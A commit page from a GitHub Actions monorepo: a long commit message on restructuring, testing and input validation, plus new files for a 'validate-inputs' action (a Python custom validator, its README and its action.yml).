ivuorinen/actions
1
0
Fork 0
mirror of https://github.com/ivuorinen/actions.git synced 2026-01-26 03:23:59 +00:00
Code Issues Packages Projects Releases Wiki Activity

feat: fixes, tweaks, new actions, linting (#186)

Browse Source 
* feat: fixes, tweaks, new actions, linting
* fix: improve docker publish loops and dotnet parsing (#193)
* fix: harden action scripts and version checks (#191)
* refactor: major repository restructuring and security enhancements

Add comprehensive development infrastructure:
- Add Makefile with automated documentation generation, formatting, and linting tasks
- Add TODO.md tracking self-containment progress and repository improvements
- Add .nvmrc for consistent Node.js version management
- Create python-version-detect-v2 action for enhanced Python detection

Enhance all GitHub Actions with standardized patterns:
- Add consistent token handling across 27 actions using standardized input patterns
- Implement bash error handling (set -euo pipefail) in all shell steps
- Add comprehensive input validation for path traversal and command injection protection
- Standardize checkout token authentication to prevent rate limiting
- Remove relative action dependencies to ensure external usability

Rewrite security workflow for PR-focused analysis:
- Transform security-suite.yml to PR-only security analysis workflow
- Remove scheduled runs, repository issue management, and Slack notifications
- Implement smart comment generation showing only sections with content
- Add GitHub Actions permission diff analysis and new action detection
- Integrate OWASP, Semgrep, and TruffleHog for comprehensive PR security scanning

Improve version detection and dependency management:
- Simplify version detection actions to use inline logic instead of shared utilities
- Fix Makefile version detection fallback to properly return 'main' when version not found
- Update all external action references to use SHA-pinned versions
- Remove deprecated run.sh in favor of Makefile automation

Update documentation and project standards:
- Enhance CLAUDE.md with self-containment requirements and linting standards
- Update README.md with improved action descriptions and usage examples
- Standardize code formatting with updated .editorconfig and .prettierrc.yml
- Improve GitHub templates for issues and security reporting

This refactoring ensures all 40 actions are fully self-contained and can be used independently when
referenced as ivuorinen/actions/action-name@main, addressing the critical requirement for external
usability while maintaining comprehensive security analysis and development automation.

* feat: add automated action catalog generation system

- Create generate_listing.cjs script for comprehensive action catalog
- Add package.json with development tooling and npm scripts
- Implement automated README.md catalog section with --update flag
- Generate markdown reference-style links for all 40 actions
- Add categorized tables with features, language support matrices
- Replace static reference links with auto-generated dynamic links
- Enable complete automation of action documentation maintenance

* feat: enhance actions with improved documentation and functionality

- Add comprehensive README files for 12 actions with usage examples
- Implement new utility actions (go-version-detect, dotnet-version-detect)
- Enhance node-setup with extensive configuration options
- Improve error handling and validation across all actions
- Update package.json scripts for better development workflow
- Expand TODO.md with detailed roadmap and improvement plans
- Standardize action structure with consistent inputs/outputs

* feat: add comprehensive output handling across all actions

- Add standardized outputs to 15 actions that previously had none
- Implement consistent snake_case naming convention for all outputs
- Add build status and test results outputs to build actions
- Add files changed and status outputs to lint/fix actions
- Add test execution metrics to php-tests action
- Add stale/closed counts to stale action
- Add release URLs and IDs to github-release action
- Update documentation with output specifications
- Mark comprehensive output handling task as complete in TODO.md

* feat: implement shared cache strategy across all actions

- Add caching to 10 actions that previously had none (Node.js, .NET, Python, Go)
- Standardize 4 existing actions to use common-cache instead of direct actions/cache
- Implement consistent cache-hit optimization to skip installations when cache available
- Add language-specific cache configurations with appropriate key files
- Create unified caching approach using ivuorinen/actions/common-cache@main
- Fix YAML syntax error in php-composer action paths parameter
- Update TODO.md to mark shared cache strategy as complete

* feat: implement comprehensive retry logic for network operations

- Create new common-retry action for standardized retry patterns with configurable strategies
- Add retry logic to 9 actions missing network retry capabilities
- Implement exponential backoff, custom timeouts, and flexible error handling
- Add max-retries input parameter to all network-dependent actions (Node.js, .NET, Python, Go)
- Standardize existing retry implementations to use common-retry utility
- Update action catalog to include new common-retry action (41 total actions)
- Update documentation with retry configuration examples and parameters
- Mark retry logic implementation as complete in TODO.md roadmap

* feat: enhance Node.js support with Corepack and Bun

- Add Corepack support for automatic package manager version management
- Add Bun package manager support across all Node.js actions
- Improve Yarn Berry/PnP support with .yarnrc.yml detection
- Add Node.js feature detection (ESM, TypeScript, frameworks)
- Update package manager detection priority and lockfile support
- Enhance caching with package-manager-specific keys
- Update eslint, prettier, and biome actions for multi-package-manager support

* fix: resolve critical runtime issues across multiple actions

- Fix token validation by removing ineffective literal string comparisons
- Add missing @microsoft/eslint-formatter-sarif dependency for SARIF output
- Fix Bash variable syntax errors in username and changelog length checks
- Update Dockerfile version regex to handle tags with suffixes (e.g., -alpine)
- Simplify version selection logic with single grep command
- Fix command execution in retry action with proper bash -c wrapper
- Correct step output references using .outcome instead of .outputs.outcome
- Add missing step IDs for version detection actions
- Include go.mod in cache key files for accurate invalidation
- Require minor version in all version regex patterns
- Improve Bun installation security by verifying script before execution
- Replace bc with sort -V for portable PHP version comparison
- Remove non-existent pre-commit output references

These fixes ensure proper runtime behavior, improved security, and better
cross-platform compatibility across all affected actions.

* fix: resolve critical runtime and security issues across actions

- Fix biome-fix files_changed calculation using git diff instead of git status delta
- Fix compress-images output description and add absolute path validation
- Remove csharp-publish token default and fix token fallback in push commands
- Add @microsoft/eslint-formatter-sarif to all package managers in eslint-check
- Fix eslint-check command syntax by using variable assignment
- Improve node-setup Bun installation security and remove invalid frozen-lockfile flag
- Fix pre-commit token validation by removing ineffective literal comparison
- Fix prettier-fix token comparison and expand regex for all GitHub token types
- Add version-file-parser regex validation safety and fix csproj wildcard handling

These fixes address security vulnerabilities, runtime errors, and functional issues
to ensure reliable operation across all affected GitHub Actions.

* feat: enhance Docker actions with advanced multi-architecture support

Major enhancement to Docker build and publish actions with comprehensive
multi-architecture capabilities and enterprise-grade features.

Added features:
- Advanced buildx configuration (version control, cache modes, build contexts)
- Auto-detect platforms for dynamic architecture discovery
- Performance optimizations with enhanced caching strategies
- Security scanning with Trivy and image signing with Cosign
- SBOM generation in multiple formats with validation
- Verbose logging and dry-run modes for debugging
- Platform-specific build args and fallback mechanisms

Enhanced all Docker actions:
- docker-build: Core buildx features and multi-arch support
- docker-publish-gh: GitHub Packages with security features
- docker-publish-hub: Docker Hub with scanning and signing
- docker-publish: Orchestrator with unified configuration

Updated documentation across all modified actions.

* fix: resolve documentation generation placeholder issue

Fixed Makefile and package.json to properly replace placeholder tokens in generated documentation, ensuring all README files show correct repository paths instead of ***PROJECT***@***VERSION***.

* chore: simplify github token validation
* chore(lint): optional yamlfmt, config and fixes
* feat: use relative `uses` names

* feat: comprehensive testing infrastructure and Python validation system

- Migrate from tests/ to _tests/ directory structure with ShellSpec framework
- Add comprehensive validation system with Python-based input validation
- Implement dual testing approach (ShellSpec + pytest) for complete coverage
- Add modern Python tooling (uv, ruff, pytest-cov) and dependencies
- Create centralized validation rules with automatic generation system
- Update project configuration and build system for new architecture
- Enhance documentation to reflect current testing capabilities

This establishes a robust foundation for action validation and testing
with extensive coverage across all GitHub Actions in the repository.

* chore: remove Dockerfile for now
* chore: code review fixes

* feat: comprehensive GitHub Actions restructuring and tooling improvements

This commit represents a major restructuring of the GitHub Actions monorepo
with improved tooling, testing infrastructure, and comprehensive PR #186
review implementation.

## Major Changes

### 🔧 Development Tooling & Configuration
- **Shellcheck integration**: Exclude shellspec test files from linting
  - Updated .pre-commit-config.yaml to exclude _tests/*.sh from shellcheck/shfmt
  - Modified Makefile shellcheck pattern to skip shellspec files
  - Updated CLAUDE.md documentation with proper exclusion syntax
- **Testing infrastructure**: Enhanced Python validation framework
  - Fixed nested if statements and boolean parameter issues in validation.py
  - Improved code quality with explicit keyword arguments
  - All pre-commit hooks now passing

### 🏗️ Project Structure & Documentation
- **Added Serena AI integration** with comprehensive project memories:
  - Project overview, structure, and technical stack documentation
  - Code style conventions and completion requirements
  - Comprehensive PR #186 review analysis and implementation tracking
- **Enhanced configuration**: Updated .gitignore, .yamlfmt.yml, pyproject.toml
- **Improved testing**: Added integration workflows and enhanced test specs

### 🚀 GitHub Actions Improvements (30+ actions updated)
- **Centralized validation**: Updated 41 validation rule files
- **Enhanced actions**: Improvements across all action categories:
  - Setup actions (node-setup, version detectors)
  - Utility actions (version-file-parser, version-validator)
  - Linting actions (biome, eslint, terraform-lint-fix major refactor)
  - Build/publish actions (docker-build, npm-publish, csharp-*)
  - Repository management actions

### 📝 Documentation Updates
- **README consistency**: Updated version references across action READMEs
- **Enhanced documentation**: Improved action descriptions and usage examples
- **CLAUDE.md**: Updated with current tooling and best practices

## Technical Improvements
- **Security enhancements**: Input validation and sanitization improvements
- **Performance optimizations**: Streamlined action logic and dependencies
- **Cross-platform compatibility**: Better Windows/macOS/Linux support
- **Error handling**: Improved error reporting and user feedback

## Files Changed
- 100 files changed
- 13 new Serena memory files documenting project state
- 41 validation rules updated for consistency
- 30+ GitHub Actions and READMEs improved
- Core tooling configuration enhanced

* feat: comprehensive GitHub Actions improvements and PR review fixes

Major Infrastructure Improvements:
- Add comprehensive testing framework with 17+ ShellSpec validation tests
- Implement Docker-based testing tools with automated test runner
- Add CodeRabbit configuration for automated code reviews
- Restructure documentation and memory management system
- Update validation rules for 25+ actions with enhanced input validation
- Modernize CI/CD workflows and testing infrastructure

Critical PR Review Fixes (All Issues Resolved):
- Fix double caching in node-setup (eliminate redundant cache operations)
- Optimize shell pipeline in version-file-parser (single awk vs complex pipeline)
- Fix GitHub expression interpolation in prettier-check cache keys
- Resolve terraform command order issue (validation after setup)
- Add missing flake8-sarif dependency for Python SARIF output
- Fix environment variable scope in pr-lint (export to GITHUB_ENV)

Performance & Reliability:
- Eliminate duplicate cache operations saving CI time
- Improve shell script efficiency with optimized parsing
- Fix command execution dependencies preventing runtime failures
- Ensure proper dependency installation for all linting tools
- Resolve workflow conditional logic issues

Security & Quality:
- All input validation rules updated with latest security patterns
- Cross-platform compatibility improvements maintained
- Comprehensive error handling and retry logic preserved
- Modern development tooling and best practices adopted

This commit addresses 100% of actionable feedback from PR review analysis,
implements comprehensive testing infrastructure, and maintains high code
quality standards across all 41 GitHub Actions.

* feat: enhance expression handling and version parsing

- Fix node-setup force-version expression logic for proper empty string handling
- Improve version-file-parser with secure regex validation and enhanced Python detection
- Add CodeRabbit configuration for CalVer versioning and README review guidance

* feat(validate-inputs): implement modular validation system

- Add modular validator architecture with specialized validators
- Implement base validator classes for different input types
- Add validators: boolean, docker, file, network, numeric, security, token, version
- Add convention mapper for automatic input validation
- Add comprehensive documentation for the validation system
- Implement PCRE regex support and injection protection

* feat(validate-inputs): add validation rules for all actions

- Add YAML validation rules for 42 GitHub Actions
- Auto-generated rules with convention mappings
- Include metadata for validation coverage and quality indicators
- Mark rules as auto-generated to prevent manual edits

* test(validate-inputs): add comprehensive test suite for validators

- Add unit tests for all validator modules
- Add integration tests for the validation system
- Add fixtures for version test data
- Test coverage for boolean, docker, file, network, numeric, security, token, and version validators
- Add tests for convention mapper and registry

* feat(tools): add validation scripts and utilities

- Add update-validators.py script for auto-generating rules
- Add benchmark-validator.py for performance testing
- Add debug-validator.py for troubleshooting
- Add generate-tests.py for test generation
- Add check-rules-not-manually-edited.sh for CI validation
- Add fix-local-action-refs.py tool for fixing action references

* feat(actions): add CustomValidator.py files for specialized validation

- Add custom validators for actions requiring special validation logic
- Implement validators for docker, go, node, npm, php, python, terraform actions
- Add specialized validation for compress-images, common-cache, common-file-check
- Implement version detection validators with language-specific logic
- Add validation for build arguments, architectures, and version formats

* test: update ShellSpec test framework for Python validation

- Update all validation.spec.sh files to use Python validator
- Add shared validation_core.py for common test utilities
- Remove obsolete bash validation helpers
- Update test output expectations for Python validator format
- Add codeql-analysis test suite
- Refactor framework utilities for Python integration
- Remove deprecated test files

* feat(actions): update action.yml files to use validate-inputs

- Replace inline bash validation with validate-inputs action
- Standardize validation across all 42 actions
- Add new codeql-analysis action
- Update action metadata and branding
- Add validation step as first step in composite actions
- Maintain backward compatibility with existing inputs/outputs

* ci: update GitHub workflows for enhanced security and testing

- Add new codeql-new.yml workflow
- Update security scanning workflows
- Enhance dependency review configuration
- Update test-actions workflow for new validation system
- Improve workflow permissions and security settings
- Update action versions to latest SHA-pinned releases

* build: update build configuration and dependencies

- Update Makefile with new validation targets
- Add Python dependencies in pyproject.toml
- Update npm dependencies and scripts
- Enhance Docker testing tools configuration
- Add targets for validator updates and local ref fixes
- Configure uv for Python package management

* chore: update linting and documentation configuration

- Update EditorConfig settings for consistent formatting
- Enhance pre-commit hooks configuration
- Update prettier and yamllint ignore patterns
- Update gitleaks security scanning rules
- Update CodeRabbit review configuration
- Update CLAUDE.md with latest project standards and rules

* docs: update Serena memory files and project metadata

- Remove obsolete PR-186 memory files
- Update project overview with current architecture
- Update project structure documentation
- Add quality standards and communication guidelines
- Add modular validator architecture documentation
- Add shellspec testing framework documentation
- Update project.yml with latest configuration

* feat: moved rules.yml to same folder as action, fixes

* fix(validators): correct token patterns and fix validator bugs

- Fix GitHub classic PAT pattern: ghp_ + 36 chars = 40 total
- Fix GitHub fine-grained PAT pattern: github_pat_ + 71 chars = 82 total
- Initialize result variable in convention_mapper to prevent UnboundLocalError
- Fix empty URL validation in network validator to return error
- Add GitHub expression check to docker architectures validator
- Update docker-build CustomValidator parallel-builds max to 16

* test(validators): fix test fixtures and expectations

- Fix token lengths in test data: github_pat 71 chars, ghp/gho 36 chars
- Update integration tests with correct token lengths
- Fix file validator test to expect absolute paths rejected for security
- Rename TestGenerator import to avoid pytest collection warning
- Update custom validator tests with correct input names
- Change docker-build tests: platforms->architectures, tags->tag
- Update docker-publish tests to match new registry enum validation

* test(shellspec): fix token lengths in test helpers and specs

- Fix default token lengths in spec_helper.sh to use correct 40-char format
- Update csharp-publish default tokens in 4 locations
- Update codeql-analysis default tokens in 2 locations
- Fix codeql-analysis test tokens to correct lengths (40 and 82 chars)
- Fix npm-publish fine-grained token test to use 82-char format

* feat(actions): add permissions documentation and environment variable usage

- Add permissions comments to all action.yml files documenting required GitHub permissions
- Convert direct input usage to environment variables in shell steps for security
- Add validation steps with proper error handling
- Update input descriptions and add security notes where applicable
- Ensure all actions follow consistent patterns for input validation

* chore(workflows): update GitHub Actions workflow versions

- Update workflow action versions to latest
- Improve workflow consistency and maintainability

* docs(security): add comprehensive security policy

- Document security features and best practices
- Add vulnerability reporting process
- Include audit history and security testing information

* docs(memory): add GitHub workflow reference documentation

- Add GitHub Actions workflow commands reference
- Add GitHub workflow expressions guide
- Add secure workflow usage patterns and best practices

* chore: token optimization, code style conventions
* chore: cr fixes
* fix: trivy reported Dockerfile problems
* fix(security): more security fixes
* chore: dockerfile and make targets for publishing
* fix(ci): add creds to test-actions workflow
* fix: security fix and checkout step to codeql-new
* chore: test fixes
* fix(security): codeql detected issues
* chore: code review fixes, ReDos protection
* style: apply MegaLinter fixes
* fix(ci): missing packages read permission
* fix(ci): add missing working directory setting
* chore: linting, add validation-regex to use regex_pattern
* chore: code review fixes
* chore(deps): update actions
* fix(security): codeql fixes
* chore(cr): apply cr comments
* chore: improve POSIX compatibility
* chore(cr): apply cr comments
* fix: codeql warning in Dockerfile, build failures
* chore(cr): apply cr comments
* fix: docker-testing-tools/Dockerfile
* chore(cr): apply cr comments
* fix(docker): update testing-tools image for GitHub Actions compatibility
* chore(cr): apply cr comments
* feat: add more tests, fix issues
* chore: fix codeql issues, update actions
* chore(cr): apply cr comments
* fix: integration tests
* chore: deduplication and fixes
* style: apply MegaLinter fixes
* chore(cr): apply cr comments
* feat: dry-run mode for generate-tests
* fix(ci): kcov installation
* chore(cr): apply cr comments
* chore(cr): apply cr comments
* chore(cr): apply cr comments
* chore(cr): apply cr comments, simplify action testing, use uv
* fix: run-tests.sh action counting
* chore(cr): apply cr comments
* chore(cr): apply cr comments
This commit is contained in:
Ismo Vuorinen
2025-10-14 13:37:58 +03:00
committed by GitHub
parent d3cc8d4790
commit 78fdad69e5
353 changed files with 55370 additions and 1714 deletions
Download Patch File Download Diff File Expand all files Collapse all files

112
validate-inputs/CustomValidator.py Executable file
View File

@@ -0,0 +1,112 @@
#!/usr/bin/env python3
"""Custom validator for validate-inputs action."""
# pylint: disable=invalid-name # Module name matches class name for clarity
from __future__ import annotations
from pathlib import Path
import re
import sys
# Add validate-inputs directory to path to import validators
validate_inputs_path = Path(__file__).parent
sys.path.insert(0, str(validate_inputs_path))
# pylint: disable=wrong-import-position
from validators.base import BaseValidator
from validators.boolean import BooleanValidator
from validators.file import FileValidator
class CustomValidator(BaseValidator):
"""Custom validator for validate-inputs action."""
def __init__(self, action_type: str = "validate-inputs") -> None:
"""Initialize validate-inputs validator."""
super().__init__(action_type)
self.boolean_validator = BooleanValidator()
self.file_validator = FileValidator()
def validate_inputs(self, inputs: dict[str, str]) -> bool: # pylint: disable=too-many-branches
"""Validate validate-inputs action inputs."""
valid = True
# Validate action/action-type input
if "action" in inputs or "action-type" in inputs:
action_input = inputs.get("action") or inputs.get("action-type", "")
# Check for empty action
if action_input == "":
self.add_error("Action name cannot be empty")
valid = False
# Allow GitHub expressions
elif action_input.startswith("${{") and action_input.endswith("}}"):
pass # GitHub expressions are valid
# Check for dangerous characters
elif any(
char in action_input
for char in [";", "`", "$", "&", "|", ">", "<", "\n", "\r", "/"]
):
self.add_error(f"Invalid characters in action name: {action_input}")
valid = False
# Validate action name format (should be lowercase with hyphens or underscores)
elif action_input and not re.match(r"^[a-z][a-z0-9_-]*[a-z0-9]$", action_input):
self.add_error(f"Invalid action name format: {action_input}")
valid = False
# Validate rules-file if provided
if inputs.get("rules-file"):
result = self.file_validator.validate_file_path(inputs["rules-file"], "rules-file")
for error in self.file_validator.errors:
if error not in self.errors:
self.add_error(error)
self.file_validator.clear_errors()
if not result:
valid = False
# Validate fail-on-error boolean
if "fail-on-error" in inputs:
value = inputs["fail-on-error"]
# Reject empty string
if value == "":
self.add_error("fail-on-error cannot be empty")
valid = False
elif value:
result = self.boolean_validator.validate_boolean(value, "fail-on-error")
for error in self.boolean_validator.errors:
if error not in self.errors:
self.add_error(error)
self.boolean_validator.clear_errors()
if not result:
valid = False
return valid
def get_required_inputs(self) -> list[str]:
"""Get list of required inputs."""
# action/action-type is required
return []
def get_validation_rules(self) -> dict:
"""Get validation rules."""
return {
"action": {
"type": "string",
"required": False,
"description": "Action name to validate",
},
"action-type": {
"type": "string",
"required": False,
"description": "Action type to validate (alias for action)",
},
"rules-file": {
"type": "file",
"required": False,
"description": "Rules file path",
},
"fail-on-error": {
"type": "boolean",
"required": False,
"description": "Whether to fail on validation error",
},
}

354
validate-inputs/README.md Normal file
View File

@@ -0,0 +1,354 @@
# ivuorinen/actions/validate-inputs
## Validate Inputs
### Description
Centralized Python-based input validation for GitHub Actions with PCRE regex support
### Inputs
| name | description | required | default |
|---------------------|------------------------------------------------------------------------------------|----------|---------|
| `action` | <p>Action name to validate (alias for action-type)</p> | `true` | `""` |
| `action-type` | <p>Type of action to validate (e.g., csharp-publish, docker-build, eslint-fix)</p> | `false` | `""` |
| `rules-file` | <p>Path to validation rules file</p> | `false` | `""` |
| `fail-on-error` | <p>Whether to fail on validation errors</p> | `false` | `true` |
| `token` | <p>GitHub token for authentication</p> | `false` | `""` |
| `namespace` | <p>Namespace/username for validation</p> | `false` | `""` |
| `email` | <p>Email address for validation</p> | `false` | `""` |
| `username` | <p>Username for validation</p> | `false` | `""` |
| `dotnet-version` | <p>.NET version string</p> | `false` | `""` |
| `terraform-version` | <p>Terraform version string</p> | `false` | `""` |
| `tflint-version` | <p>TFLint version string</p> | `false` | `""` |
| `node-version` | <p>Node.js version string</p> | `false` | `""` |
| `force-version` | <p>Force version override</p> | `false` | `""` |
| `default-version` | <p>Default version fallback</p> | `false` | `""` |
| `image-name` | <p>Docker image name</p> | `false` | `""` |
| `tag` | <p>Docker image tag</p> | `false` | `""` |
| `architectures` | <p>Target architectures</p> | `false` | `""` |
| `dockerfile` | <p>Dockerfile path</p> | `false` | `""` |
| `context` | <p>Docker build context</p> | `false` | `""` |
| `build-args` | <p>Docker build arguments</p> | `false` | `""` |
| `buildx-version` | <p>Docker Buildx version</p> | `false` | `""` |
| `max-retries` | <p>Maximum retry attempts</p> | `false` | `""` |
| `image-quality` | <p>Image quality percentage</p> | `false` | `""` |
| `png-quality` | <p>PNG quality percentage</p> | `false` | `""` |
| `parallel-builds` | <p>Number of parallel builds</p> | `false` | `""` |
| `pre-commit-config` | <p>Pre-commit configuration file path</p> | `false` | `""` |
| `base-branch` | <p>Base branch name</p> | `false` | `""` |
| `dry-run` | <p>Dry run mode</p> | `false` | `""` |
| `is_fiximus` | <p>Use Fiximus bot</p> | `false` | `""` |
| `prefix` | <p>Release tag prefix</p> | `false` | `""` |
| `language` | <p>Language to analyze (for CodeQL)</p> | `false` | `""` |
| `queries` | <p>CodeQL queries to run</p> | `false` | `""` |
| `packs` | <p>CodeQL query packs</p> | `false` | `""` |
| `config-file` | <p>CodeQL configuration file path</p> | `false` | `""` |
| `config` | <p>CodeQL configuration YAML string</p> | `false` | `""` |
| `build-mode` | <p>Build mode for compiled languages</p> | `false` | `""` |
| `source-root` | <p>Source code root directory</p> | `false` | `""` |
| `category` | <p>Analysis category</p> | `false` | `""` |
| `checkout-ref` | <p>Git reference to checkout</p> | `false` | `""` |
| `working-directory` | <p>Working directory for analysis</p> | `false` | `""` |
| `upload-results` | <p>Upload results to GitHub Security</p> | `false` | `""` |
| `ram` | <p>Memory in MB for CodeQL</p> | `false` | `""` |
| `threads` | <p>Number of threads for CodeQL</p> | `false` | `""` |
| `output` | <p>Output path for SARIF results</p> | `false` | `""` |
| `skip-queries` | <p>Skip running queries</p> | `false` | `""` |
| `add-snippets` | <p>Add code snippets to SARIF</p> | `false` | `""` |
### Outputs
| name | description |
|---------------------|----------------------------------------------------|
| `validation-status` | <p>Overall validation status (success/failure)</p> |
| `error-message` | <p>Validation error message if failed</p> |
| `validation-result` | <p>Detailed validation result</p> |
| `errors-found` | <p>Number of validation errors found</p> |
| `rules-applied` | <p>Number of validation rules applied</p> |
### Runs
This action is a `composite` action.
### Usage
```yaml
- uses: ivuorinen/actions/validate-inputs@main
with:
action:
# Action name to validate (alias for action-type)
#
# Required: true
# Default: ""
action-type:
# Type of action to validate (e.g., csharp-publish, docker-build, eslint-fix)
#
# Required: false
# Default: ""
rules-file:
# Path to validation rules file
#
# Required: false
# Default: ""
fail-on-error:
# Whether to fail on validation errors
#
# Required: false
# Default: true
token:
# GitHub token for authentication
#
# Required: false
# Default: ""
namespace:
# Namespace/username for validation
#
# Required: false
# Default: ""
email:
# Email address for validation
#
# Required: false
# Default: ""
username:
# Username for validation
#
# Required: false
# Default: ""
dotnet-version:
# .NET version string
#
# Required: false
# Default: ""
terraform-version:
# Terraform version string
#
# Required: false
# Default: ""
tflint-version:
# TFLint version string
#
# Required: false
# Default: ""
node-version:
# Node.js version string
#
# Required: false
# Default: ""
force-version:
# Force version override
#
# Required: false
# Default: ""
default-version:
# Default version fallback
#
# Required: false
# Default: ""
image-name:
# Docker image name
#
# Required: false
# Default: ""
tag:
# Docker image tag
#
# Required: false
# Default: ""
architectures:
# Target architectures
#
# Required: false
# Default: ""
dockerfile:
# Dockerfile path
#
# Required: false
# Default: ""
context:
# Docker build context
#
# Required: false
# Default: ""
build-args:
# Docker build arguments
#
# Required: false
# Default: ""
buildx-version:
# Docker Buildx version
#
# Required: false
# Default: ""
max-retries:
# Maximum retry attempts
#
# Required: false
# Default: ""
image-quality:
# Image quality percentage
#
# Required: false
# Default: ""
png-quality:
# PNG quality percentage
#
# Required: false
# Default: ""
parallel-builds:
# Number of parallel builds
#
# Required: false
# Default: ""
pre-commit-config:
# Pre-commit configuration file path
#
# Required: false
# Default: ""
base-branch:
# Base branch name
#
# Required: false
# Default: ""
dry-run:
# Dry run mode
#
# Required: false
# Default: ""
is_fiximus:
# Use Fiximus bot
#
# Required: false
# Default: ""
prefix:
# Release tag prefix
#
# Required: false
# Default: ""
language:
# Language to analyze (for CodeQL)
#
# Required: false
# Default: ""
queries:
# CodeQL queries to run
#
# Required: false
# Default: ""
packs:
# CodeQL query packs
#
# Required: false
# Default: ""
config-file:
# CodeQL configuration file path
#
# Required: false
# Default: ""
config:
# CodeQL configuration YAML string
#
# Required: false
# Default: ""
build-mode:
# Build mode for compiled languages
#
# Required: false
# Default: ""
source-root:
# Source code root directory
#
# Required: false
# Default: ""
category:
# Analysis category
#
# Required: false
# Default: ""
checkout-ref:
# Git reference to checkout
#
# Required: false
# Default: ""
working-directory:
# Working directory for analysis
#
# Required: false
# Default: ""
upload-results:
# Upload results to GitHub Security
#
# Required: false
# Default: ""
ram:
# Memory in MB for CodeQL
#
# Required: false
# Default: ""
threads:
# Number of threads for CodeQL
#
# Required: false
# Default: ""
output:
# Output path for SARIF results
#
# Required: false
# Default: ""
skip-queries:
# Skip running queries
#
# Required: false
# Default: ""
add-snippets:
# Add code snippets to SARIF
#
# Required: false
# Default: ""
```

241
validate-inputs/action.yml Normal file
View File

@@ -0,0 +1,241 @@
# yaml-language-server: $schema=https://json.schemastore.org/github-action.json
# permissions:
# - (none required) # Validation-only action
---
name: 'Validate Inputs'
description: 'Centralized Python-based input validation for GitHub Actions with PCRE regex support'
author: 'Ismo Vuorinen'
branding:
icon: 'shield'
color: 'green'
inputs:
action:
description: 'Action name to validate (alias for action-type)'
required: true
action-type:
description: 'Type of action to validate (e.g., csharp-publish, docker-build, eslint-fix)'
required: false
rules-file:
description: 'Path to validation rules file'
required: false
fail-on-error:
description: 'Whether to fail on validation errors'
required: false
default: 'true'
# Common inputs that can be validated across actions
token:
description: 'GitHub token for authentication'
required: false
namespace:
description: 'Namespace/username for validation'
required: false
email:
description: 'Email address for validation'
required: false
username:
description: 'Username for validation'
required: false
# Version-related inputs
dotnet-version:
description: '.NET version string'
required: false
terraform-version:
description: 'Terraform version string'
required: false
tflint-version:
description: 'TFLint version string'
required: false
node-version:
description: 'Node.js version string'
required: false
force-version:
description: 'Force version override'
required: false
default-version:
description: 'Default version fallback'
required: false
# Docker-related inputs
image-name:
description: 'Docker image name'
required: false
tag:
description: 'Docker image tag'
required: false
architectures:
description: 'Target architectures'
required: false
dockerfile:
description: 'Dockerfile path'
required: false
context:
description: 'Docker build context'
required: false
build-args:
description: 'Docker build arguments'
required: false
buildx-version:
description: 'Docker Buildx version'
required: false
# Numeric inputs
max-retries:
description: 'Maximum retry attempts'
required: false
image-quality:
description: 'Image quality percentage'
required: false
png-quality:
description: 'PNG quality percentage'
required: false
parallel-builds:
description: 'Number of parallel builds'
required: false
# File/path inputs
pre-commit-config:
description: 'Pre-commit configuration file path'
required: false
base-branch:
description: 'Base branch name'
required: false
# Boolean inputs
dry-run:
description: 'Dry run mode'
required: false
is_fiximus:
description: 'Use Fiximus bot'
required: false
# Release inputs
prefix:
description: 'Release tag prefix'
required: false
# CodeQL-specific inputs
language:
description: 'Language to analyze (for CodeQL)'
required: false
queries:
description: 'CodeQL queries to run'
required: false
packs:
description: 'CodeQL query packs'
required: false
config-file:
description: 'CodeQL configuration file path'
required: false
config:
description: 'CodeQL configuration YAML string'
required: false
build-mode:
description: 'Build mode for compiled languages'
required: false
source-root:
description: 'Source code root directory'
required: false
category:
description: 'Analysis category'
required: false
checkout-ref:
description: 'Git reference to checkout'
required: false
working-directory:
description: 'Working directory for analysis'
required: false
upload-results:
description: 'Upload results to GitHub Security'
required: false
ram:
description: 'Memory in MB for CodeQL'
required: false
threads:
description: 'Number of threads for CodeQL'
required: false
output:
description: 'Output path for SARIF results'
required: false
skip-queries:
description: 'Skip running queries'
required: false
add-snippets:
description: 'Add code snippets to SARIF'
required: false
outputs:
validation-status:
description: 'Overall validation status (success/failure)'
value: ${{ steps.validate.outputs.status }}
error-message:
description: 'Validation error message if failed'
value: ${{ steps.validate.outputs.error }}
validation-result:
description: 'Detailed validation result'
value: ${{ steps.validate.outputs.result }}
errors-found:
description: 'Number of validation errors found'
value: ${{ steps.validate.outputs.errors }}
rules-applied:
description: 'Number of validation rules applied'
value: ${{ steps.validate.outputs.rules }}
runs:
using: composite
steps:
- name: Validate Action Inputs with Python
id: validate
shell: bash
working-directory: ${{ github.action_path }}
run: python3 validator.py
env:
INPUT_ACTION: ${{ inputs.action }}
INPUT_ACTION_TYPE: ${{ inputs.action-type }}
INPUT_RULES_FILE: ${{ inputs.rules-file }}
INPUT_FAIL_ON_ERROR: ${{ inputs.fail-on-error }}
INPUT_TOKEN: ${{ inputs.token }}
INPUT_NAMESPACE: ${{ inputs.namespace }}
INPUT_EMAIL: ${{ inputs.email }}
INPUT_USERNAME: ${{ inputs.username }}
INPUT_DOTNET_VERSION: ${{ inputs.dotnet-version }}
INPUT_TERRAFORM_VERSION: ${{ inputs.terraform-version }}
INPUT_TFLINT_VERSION: ${{ inputs.tflint-version }}
INPUT_NODE_VERSION: ${{ inputs.node-version }}
INPUT_FORCE_VERSION: ${{ inputs.force-version }}
INPUT_DEFAULT_VERSION: ${{ inputs.default-version }}
INPUT_IMAGE_NAME: ${{ inputs.image-name }}
INPUT_TAG: ${{ inputs.tag }}
INPUT_ARCHITECTURES: ${{ inputs.architectures }}
INPUT_DOCKERFILE: ${{ inputs.dockerfile }}
INPUT_CONTEXT: ${{ inputs.context }}
INPUT_BUILD_ARGS: ${{ inputs.build-args }}
INPUT_BUILDX_VERSION: ${{ inputs.buildx-version }}
INPUT_MAX_RETRIES: ${{ inputs.max-retries }}
INPUT_IMAGE_QUALITY: ${{ inputs.image-quality }}
INPUT_PNG_QUALITY: ${{ inputs.png-quality }}
INPUT_PARALLEL_BUILDS: ${{ inputs.parallel-builds }}
INPUT_PRE_COMMIT_CONFIG: ${{ inputs.pre-commit-config }}
INPUT_BASE_BRANCH: ${{ inputs.base-branch }}
INPUT_DRY_RUN: ${{ inputs.dry-run }}
INPUT_IS_FIXIMUS: ${{ inputs.is_fiximus }}
INPUT_PREFIX: ${{ inputs.prefix }}
INPUT_LANGUAGE: ${{ inputs.language }}
INPUT_QUERIES: ${{ inputs.queries }}
INPUT_PACKS: ${{ inputs.packs }}
INPUT_CONFIG_FILE: ${{ inputs.config-file }}
INPUT_CONFIG: ${{ inputs.config }}
